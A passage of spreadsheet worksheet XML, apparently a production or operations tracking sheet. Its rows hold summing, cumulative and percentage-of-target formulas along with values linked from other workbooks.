        <f>J22+J32+J42+J52+J62+J69</f>
        <v>17178.5</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'26'!K12</f>
        <v>450949.763</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5480056.139</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>175387.602000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>39.9516177676653</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]27'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]27'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]27'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]27'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]27'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]27'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]27'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]27'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]27'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'26'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'26'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>32.1812113761561</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]27'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]27'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]27'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]27'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]27'!$U$68</f>
        <v>60.3348765432099</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]27'!$V$68</f>
        <v>70.7121421975993</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]27'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]27'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]27'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2613</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'26'!H14</f>
        <v>73030</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1037573.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6262.97</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'26'!K14</f>
        <v>147494.605</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1940438.711</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>52110.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]27'!$W$71</f>
        <v>230</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]27'!$X$71</f>
        <v>220.58785942492</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]27'!$Y$71</f>
        <v>214.011694895725</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]27'!$T$71</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]27'!$U$71</f>
        <v>48.3024691358025</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]27'!$V$71</f>
        <v>50.0865650969529</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]27'!$Q$71</f>
        <v>11.50</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]27'!$R$71</f>
        <v>313.00</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]27'!$S$71</f>
        <v>4339.50</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'26'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'26'!K15</f>
        <v>8875.168</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>123631.668</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]27'!$W$72</f>
        <v>57.75</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]27'!$X$72</f>
        <v>63.0324647295363</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]27'!$Y$72</f>
        <v>61.4549301678766</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]27'!$T$72</f>
        <v>100</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]27'!$U$72</f>
        <v>67.9274691358025</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]27'!$V$72</f>
        <v>52.0391274238227</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]27'!$Q$72</f>
        <v>24.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]27'!$R$72</f>
        <v>440.17</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]27'!$S$72</f>
        <v>4508.67</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'26'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'26'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]27'!$W$73</f>
        <v>57.25</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]27'!$X$73</f>
        <v>60.8413370049477</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]27'!$Y$73</f>
        <v>62.7171604693638</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]27'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]27'!$U$73</f>
        <v>68.9305555555556</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]27'!$V$73</f>
        <v>53.5881809787627</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]27'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]27'!$R$73</f>
        <v>446.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]27'!$S$73</f>
        <v>4642.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'26'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'26'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]27'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]27'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]27'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]27'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]27'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]27'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]27'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]27'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]27'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'26'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'26'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]27'!$W$74</f>
        <v>219.9</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]27'!$X$74</f>
        <v>217.79347826087</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]27'!$Y$74</f>
        <v>221.756151270014</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]27'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]27'!$U$74</f>
        <v>14.1975308641975</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]27'!$V$74</f>
        <v>7.54766851338873</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]27'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]27'!$R$74</f>
        <v>92</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]27'!$S$74</f>
        <v>653.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'26'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'26'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]27'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]27'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]27'!$Y$72</f>
        <v>9.15760869565217e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]27'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]27'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]27'!$V$72</f>
        <v>4.24746075715605e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]27'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]27'!$R$72</f>
        <v>2.7e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]27'!$S$72</f>
        <v>0.000368</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'26'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'26'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]27'!$W$73</f>
        <v>244.155823160174</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]27'!$X$73</f>
        <v>197.461753905292</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]27'!$Y$73</f>
        <v>237.996474723224</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]27'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]27'!$U$73</f>
        <v>28.6898189814815</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]27'!$V$73</f>
        <v>68.8785822714681</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]27'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]27'!$R$73</f>
        <v>185.910027</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]27'!$S$73</f>
        <v>5967.640368</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]27'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]27'!$E$22</f>
        <v>5948</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'26'!H21</f>
        <v>193808</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2303246</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]27'!$I$22</f>
        <v>8174.92</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'26'!K21</f>
        <v>217046.91</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2283500.91</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]27'!$L$22</f>
        <v>59814.4</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>127.264680851064</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]27'!$W$81</f>
        <v>238.75</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]27'!$X$81</f>
        <v>279.324803523096</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]27'!$Y$81</f>
        <v>275.932775696389</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]27'!$T$81</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]27'!$U$81</f>
        <v>33.2121484910837</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]27'!$V$81</f>
        <v>35.906948933005</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]27'!$Q$81</f>
        <v>8</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]27'!$R$81</f>
        <v>215.214722222222</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]27'!$S$81</f>
        <v>3110.97805555556</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]27'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]27'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'26'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]27'!$I$17</f>
        <v>6146.5</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'26'!K22</f>
        <v>181851.39</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2073312.77</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]27'!$L$17</f>
        <v>70774.962</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>35.387481</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]27'!$W$79</f>
        <v>102.625</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]27'!$X$79</f>
        <v>101.429775651034</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]27'!$Y$79</f>
        <v>102.195291236113</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]27'!$T$79</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]27'!$U$79</f>
        <v>47.4968278463649</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]27'!$V$79</f>
        <v>45.5371460449369</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]27'!$Q$79</f>
        <v>8</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]27'!$R$79</f>
        <v>307.779444444444</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]27'!$S$79</f>
        <v>3945.33833333333</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]27'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]27'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'26'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]27'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'26'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]27'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]27'!$W$80</f>
        <v>78.25</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]27'!$X$80</f>
        <v>84.0329061413441</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]27'!$Y$80</f>
        <v>79.5563735393656</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]27'!$T$80</f>
        <v>100</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]27'!$U$80</f>
        <v>38.5027006172839</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]27'!$V$80</f>
        <v>32.9449830717144</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]27'!$Q$80</f>
        <v>24</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]27'!$R$80</f>
        <v>249.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]27'!$S$80</f>
        <v>2854.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]27'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]27'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'26'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]27'!$I$56</f>
        <v>1524.5</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'26'!K24</f>
        <v>39225.61</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>319052.14</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]27'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]27'!$R$6</f>
        <v>75</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]27'!$S$6</f>
        <v>83.9605104501608</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]27'!$T$6</f>
        <v>85.9701655052265</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]27'!$O$6</f>
        <v>100</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]27'!$P$6</f>
        <v>61.4320987654321</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]27'!$Q$6</f>
        <v>53.0009233610342</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]27'!$L$6</f>
        <v>24</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]27'!$M$6</f>
        <v>398.08</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]27'!$N$6</f>
        <v>4592</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]27'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'26'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]27'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'26'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]27'!$R$7</f>
        <v>172</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]27'!$S$7</f>
        <v>190.345205479452</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]27'!$T$7</f>
        <v>187.8021597327</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]27'!$O$7</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]27'!$P$7</f>
        <v>56.3271604938272</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]27'!$Q$7</f>
        <v>50.6415050784857</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]27'!$L$7</f>
        <v>16.25</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]27'!$M$7</f>
        <v>365</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]27'!$N$7</f>
        <v>4387.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'26'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'26'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]27'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]27'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]27'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]27'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]27'!$G$38</f>
        <v>0</v>
      </c>
